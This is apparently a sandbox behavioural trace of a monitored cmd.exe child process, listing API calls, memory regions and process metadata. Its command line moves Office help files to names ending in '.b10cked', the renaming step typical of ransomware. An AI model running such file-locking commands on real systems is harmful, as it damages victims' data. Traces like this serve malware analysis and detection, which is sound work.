lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0201.740] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0201.740] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.740] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0201.740] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0201.740] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0201.740] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0201.740] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0201.740] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0201.740] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0201.740] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0201.740] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0201.740] GetEnvironmentStringsW () returned 0x3222e8* [0201.740] FreeEnvironmentStringsW (penv=0x3222e8) returned 1 [0201.740] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.740] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.740] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0201.740] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0201.740] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0201.740] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0201.740] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0201.740] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0201.740] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0201.740] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0201.741] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef7f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.741] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef7f8, lpFilePart=0x1ef7f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef7f4*="Desktop") returned 0x18 [0201.741] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.741] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef574 | out: lpFindFileData=0x1ef574) returned 0x320028 [0201.741] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0201.741] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef574 | out: lpFindFileData=0x1ef574) returned 0x320028 [0201.741] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0201.741] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef574 | out: lpFindFileData=0x1ef574) returned 0x320028 [0201.741] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0201.742] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.742] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0201.742] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0201.742] GetEnvironmentStringsW () returned 0x322b08* [0201.742] FreeEnvironmentStringsW (penv=0x322b08) returned 1 [0201.742] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.742] GetConsoleOutputCP () returned 0x1b5 [0201.756] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.756] GetUserDefaultLCID () returned 0x409 [0201.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0201.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef938, cchData=128 | out: lpLCData="0") returned 2 [0201.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef938, cchData=128 | out: lpLCData="0") returned 2 [0201.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef938, cchData=128 | out: lpLCData="1") returned 2 [0201.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0201.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0201.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0201.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0201.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0201.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0201.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0201.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0201.761] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0201.761] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0201.761] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0201.762] GetConsoleTitleW (in: lpConsoleTitle=0x3108f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.774] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.774] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0201.774] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0201.774] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0201.775] _wcsicmp (_String1="move", _String2=")") returned 68 [0201.775] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0201.775] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0201.775] _wcsicmp (_String1="IF", _String2="move") returned -4 [0201.775] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0201.775] _wcsicmp (_String1="REM", _String2="move") returned 5 [0201.775] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0201.778] GetConsoleTitleW (in: lpConsoleTitle=0x1ef630, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.806] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0201.806] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0201.806] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0201.806] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0201.806] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0201.806] _wcsicmp (_String1="move", _String2="CD") returned 10 [0201.806] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0201.806] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0201.806] _wcsicmp (_String1="move", _String2="REN") returned -5 [0201.806] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0201.806] _wcsicmp (_String1="move", _String2="SET") returned -6 [0201.806] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0201.806] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0201.806] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0201.806] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0201.806] _wcsicmp (_String1="move", _String2="MD") returned 11 [0201.806] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0201.806] _wcsicmp (_String1="move", _String2="RD") returned -5 [0201.806] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0201.806] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0201.806] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0201.806] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0201.806] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0201.806] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0201.806] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0201.806] _wcsicmp (_String1="move", _String2="VER") returned -9 [0201.806] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0201.806] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0201.806] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0201.806] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0201.806] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0201.806] _wcsicmp (_String1="move", _String2="START") returned -6 [0201.806] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0201.806] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0201.806] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0201.808] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.808] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.808] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef3ec, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef3e4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef3e4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0201.808] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0201.808] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0201.808] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0201.808] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0201.808] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0201.809] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0201.809] _wcsicmp (_String1="MSPOWE~2.HXN", _String2=".") returned 63 [0201.809] _wcsicmp (_String1="MSPOWE~2.HXN", _String2="..") returned 63 [0201.810] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mspowe~2.hxn")) returned 0x2022 [0201.810] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321e60 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.810] SetErrorMode (uMode=0x0) returned 0x0 [0201.810] SetErrorMode (uMode=0x1) returned 0x0 [0201.810] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN", nBufferLength=0x104, lpBuffer=0x1eed74, lpFilePart=0x1eed5c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN", lpFilePart=0x1eed5c*="MSPOWE~2.HXN") returned 0x27 [0201.810] SetErrorMode (uMode=0x0) returned 0x1 [0201.810] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0201.810] _wcsicmp (_String1="MSPOWE~2.HXN", _String2=".") returned 63 [0201.810] _wcsicmp (_String1="MSPOWE~2.HXN", _String2="..") returned 63 [0201.810] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mspowe~2.hxn")) returned 0x2022 [0201.810] SetErrorMode (uMode=0x0) returned 0x0 [0201.810] SetErrorMode (uMode=0x1) returned 0x0 [0201.810] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN", nBufferLength=0x104, lpBuffer=0x1ef1f0, lpFilePart=0x1eef88 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN", lpFilePart=0x1eef88*="MSPOWE~2.HXN") returned 0x27 [0201.810] SetErrorMode (uMode=0x0) returned 0x1 [0201.810] SetErrorMode (uMode=0x0) returned 0x0 [0201.811] SetErrorMode (uMode=0x1) returned 0x0 [0201.811] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.DEV.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x1ef3f8, lpFilePart=0x1eef88 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.DEV.14.1033.hxn.b10cked", lpFilePart=0x1eef88*="MS.POWERPNT.DEV.14.1033.hxn.b10cked") returned 0x3e [0201.811] SetErrorMode (uMode=0x0) returned 0x1 [0201.811] SetLastError (dwErrCode=0x0) [0201.811] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.DEV.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.powerpnt.dev.14.1033.hxn.b10cked")) returned 0xffffffff [0201.811] GetLastError () returned 0x2 [0201.811] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x1ee904, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee904) returned 0x310e98 [0201.811] FindNextFileW (in: hFindFile=0x310e98, lpFindFileData=0x1ee904 | out: lpFindFileData=0x1ee904) returned 0 [0201.812] FindClose (in: hFindFile=0x310e98 | out: hFindFile=0x310e98) returned 1 [0201.812] GetLastError () returned 0x12 [0201.812] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x1ee904, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee904) returned 0x310e98 [0201.812] FindNextFileW (in: hFindFile=0x310e98, lpFindFileData=0x1ee904 | out: lpFindFileData=0x1ee904) returned 0 [0201.812] FindClose (in: hFindFile=0x310e98 | out: hFindFile=0x310e98) returned 1 [0201.812] GetLastError () returned 0x12 [0201.813] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x321c00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321c00) returned 0x310e98 [0201.813] FindNextFileW (in: hFindFile=0x310e98, lpFindFileData=0x321c00 | out: lpFindFileData=0x321c00) returned 0 [0201.813] FindClose (in: hFindFile=0x310e98 | out: hFindFile=0x310e98) returned 1 [0201.813] GetLastError () returned 0x12 [0201.813] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x321c00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321c00) returned 0x310e98 [0201.813] FindNextFileW (in: hFindFile=0x310e98, lpFindFileData=0x321c00 | out: lpFindFileData=0x321c00) returned 0 [0201.813] FindClose (in: hFindFile=0x310e98 | out: hFindFile=0x310e98) returned 1 [0201.813] GetLastError () returned 0x12 [0201.813] _get_osfhandle (_FileHandle=2) returned 0xb [0201.813] GetFileType (hFile=0xb) returned 0x2 [0201.835] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0201.835] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1eead4 | out: lpMode=0x1eead4) returned 1 [0201.836] _get_osfhandle (_FileHandle=2) returned 0xb [0201.836] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1eeb08 | out: lpConsoleScreenBufferInfo=0x1eeb08) returned 1 [0201.839] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.840] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1eeb48 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.840] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x1eeb2c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1eeb2c*=0x2c) returned 1 [0201.842] longjmp () [0201.842] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.842] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.843] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.843] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.843] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.844] SetConsoleInputExeNameW () returned 0x1 [0201.844] GetConsoleOutputCP () returned 0x1b5 [0201.845] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.845] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.849] exit (_Code=1) Process: id = "476" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ec0" os_pid = "0xe58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.SETLANG.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29346 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29347 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29348 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29349 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 29350 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29351 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29352 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29353 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29354 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 29355 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29550 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29551 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29552 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29553 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 29554 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 29555 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29556 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29557 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29558 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29559 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29560 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29561 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29562 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29563 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29616 start_va = 0x1f0000 end_va = 0x2b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 29617 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29618 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29619 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29620 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 29621 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 29622 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 29623 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 29624 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 29625 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 29681 start_va = 0x1310000 end_va = 0x13cffff entry_point = 0x1310000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 673 os_tid = 0xe84 [0201.668] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efb24 | out: lpSystemTimeAsFileTime=0x1efb24*(dwLowDateTime=0xad02af40, dwHighDateTime=0x1d440a9)) [0201.668] GetCurrentProcessId () returned 0xe58 